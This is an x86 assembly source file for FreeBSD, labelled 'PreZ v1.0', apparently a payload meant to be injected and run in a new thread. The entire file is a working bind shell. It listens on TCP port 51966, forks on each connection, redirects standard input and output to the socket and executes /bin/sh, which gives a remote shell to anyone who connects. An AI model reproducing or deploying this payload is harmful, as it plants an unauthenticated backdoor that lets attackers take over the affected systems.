# PreZ v1.0 - FreeBSD Version
# This is the code that will be executed in the new thread

.equ    SYS_socket, 97
.equ    SYS_bind, 104
.equ    SYS_listen, 106
.equ    SYS_accept, 30
.equ    SYS_fork, 2
.equ    SYS_close, 6
.equ    SYS_dup2, 90
.equ    SYS_execve, 59
.equ    SYS_exit, 1

.equ    AF_INET, 2
.equ    SOCK_STREAM, 1

# Save some space for various variables
    subl    $0x20, %esp

# Create socket
    pushl   $0
    pushl   $SOCK_STREAM
    pushl   $AF_INET
    movl    $SYS_socket, %eax
    pushl   $0
    int     $0x80 
    addl    $16, %esp
# Keep it at %edi
    movl    %eax, %edi

# Bind
    movw    $AF_INET, -0x10(%ebp)
    movw    $0xcafe, -0x0e(%ebp)
    movl    $0, -0xc(%ebp)
    movl    $0, -0x8(%ebp)
    movl    $0, -0x4(%ebp)
    pushl   $16
    leal    -0x10(%ebp), %eax
    pushl   %eax
    pushl   %edi
    movl    $SYS_bind, %eax
    pushl   $0
    int     $0x80
    addl    $16, %esp

# Listen
    pushl   $15
    pushl   %edi
    movl    $SYS_listen, %eax
    pushl   $0
    int     $0x80
    addl    $12, %esp

accept_conn:
    pushl   $0
    pushl   $0
    pushl   %edi
    movl    $SYS_accept, %eax
    pushl   $0
    int     $0x80
    addl    $16, %esp
# Keep it at %esi
    movl    %eax, %esi

    movl    $SYS_fork, %eax
    pushl   $0
    int     $0x80
    addl    $4, %esp
    test    %eax, %eax
    jnz     accept_conn

    pushl   $0
    movl    $SYS_close, %eax
    pushl   $0
    int     $0x80
    addl    $8, %esp

    pushl   $1
    movl    $SYS_close, %eax
    pushl   $0
    int     $0x80
    addl    $8, %esp

    pushl   $2
    movl    $SYS_close, %eax
    pushl   $0
    int     $0x80
    addl    $8, %esp

    pushl   $0
    pushl   %esi
    movl    $SYS_dup2, %eax
    pushl   $0
    int     $0x80
    addl    $12, %esp

    pushl   $1
    pushl   %esi
    movl    $SYS_dup2, %eax
    pushl   $0
    int     $0x80
    addl    $12, %esp

    pushl   $2
    pushl   %esi
    movl    $SYS_dup2, %eax
    pushl   $0
    int     $0x80
    addl    $12, %esp

    movl    $0x0068732f, -0x4(%ebp)
    movl    $0x6e69622f, -0x8(%ebp)
    leal    -0x8(%ebp), %eax
    movl    $0, -0xc(%ebp)
    movl    %eax, -0x10(%ebp)
    leal    -0x10(%ebp), %ebx
    pushl   $0
    pushl   %ebx
    pushl   %eax
    movl    $SYS_execve, %eax
    pushl   $0
    int     $0x80
    addl    $16, %esp

    pushl   $0
    movl    $SYS_exit, %eax
    pushl   $0
    int     $0x80
